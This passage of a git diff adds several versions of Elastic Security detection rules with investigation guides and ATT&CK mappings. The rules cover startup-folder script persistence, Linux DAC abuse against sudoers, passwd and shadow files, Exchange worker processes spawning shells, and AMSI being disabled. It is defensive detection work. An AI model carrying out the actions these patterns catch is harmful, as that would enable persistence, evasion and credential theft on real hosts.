necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n file.extension : (\"lnk\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\") and\n not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\")) and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + }, + { + "id": "T1547.009", + "name": "Shortcut Modification", + "reference": "https://attack.mitre.org/techniques/T1547/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json new file mode 100644 index 00000000000..096189eb54b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_111.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistent Scripts in the Startup Directory", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n file.extension : (\"lnk\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\") and\n not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\")) and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + }, + { + "id": "T1547.009", + "name": "Shortcut Modification", + "reference": "https://attack.mitre.org/techniques/T1547/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json b/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json new file mode 100644 index 00000000000..24101162f80 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c70f2e-4616-439c-85ac-5b98415042fe_2.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential privilege escalation exploitation of DAC (Discretionary access control) file permissions. The rule identifies exploitation of DAC checks on sensitive file paths via suspicious processes whose capabilities include CAP_DAC_OVERRIDE (where a process can bypass all read write and execution checks) or CAP_DAC_READ_SEARCH (where a process can read any file or perform any executable permission on the directories).", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Linux DAC permissions", + "new_terms_fields": [ + "host.id", + "process.command_line", + "process.executable" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and event.action:exec and\n(process.thread.capabilities.permitted:CAP_DAC_* or process.thread.capabilities.effective: CAP_DAC_*) and\nprocess.command_line:(*sudoers* or *passwd* or *shadow* or */root/*) and not user.id:\"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c70f2e-4616-439c-85ac-5b98415042fe", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "f7c70f2e-4616-439c-85ac-5b98415042fe_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json new file mode 100644 index 00000000000..3eea16b0699 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_108.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Worker Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f81ee52c-297e-46d9-9205-07e66931df26_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json new file mode 100644 index 00000000000..0c7b13d5ee2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_109.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Worker Spawning Suspicious Processes", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"w3wp.exe\" and process.parent.args : \"MSExchange*AppPool\" and\n (process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or\n ?process.pe.original_file_name in (\"cmd.exe\", \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\"))\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f81ee52c-297e-46d9-9205-07e66931df26_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json new file mode 100644 index 00000000000..058a04bd396 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Adobe Acrobat Reader PrivilegedHelperTool responsible for installing updates. For more information, refer to CVE-2020-9615, CVE-2020-9614 and CVE-2020-9613 and verify that the impacted system is patched.", + "false_positives": [ + "Trusted system or Adobe Acrobat Related processes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Child Process of Adobe Acrobat Reader Update Service", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.parent.name:com.adobe.ARMDC.SMJobBlessHelper and\n user.name:root and\n not process.executable: (/Library/PrivilegedHelperTools/com.adobe.ARMDC.SMJobBlessHelper or\n /usr/bin/codesign or\n /private/var/folders/zz/*/T/download/ARMDCHammer or\n /usr/sbin/pkgutil or\n /usr/bin/shasum or\n /usr/bin/perl* or\n /usr/sbin/spctl or\n /usr/sbin/installer or\n /usr/bin/csrutil)\n", + "references": [ + "https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json new file mode 100644 index 00000000000..00d235a1aee --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f874315d-5188-4b4a-8521-d1c73093a7e4_109.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of AmsiEnable Registry Key", + "note": "## Triage and analysis\n\n### Investigating Modification of AmsiEnable Registry Key\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nSince AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it.\n\nThis rule monitors the modifications to the Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable registry key.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Retrieve scripts or Microsoft Office files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware 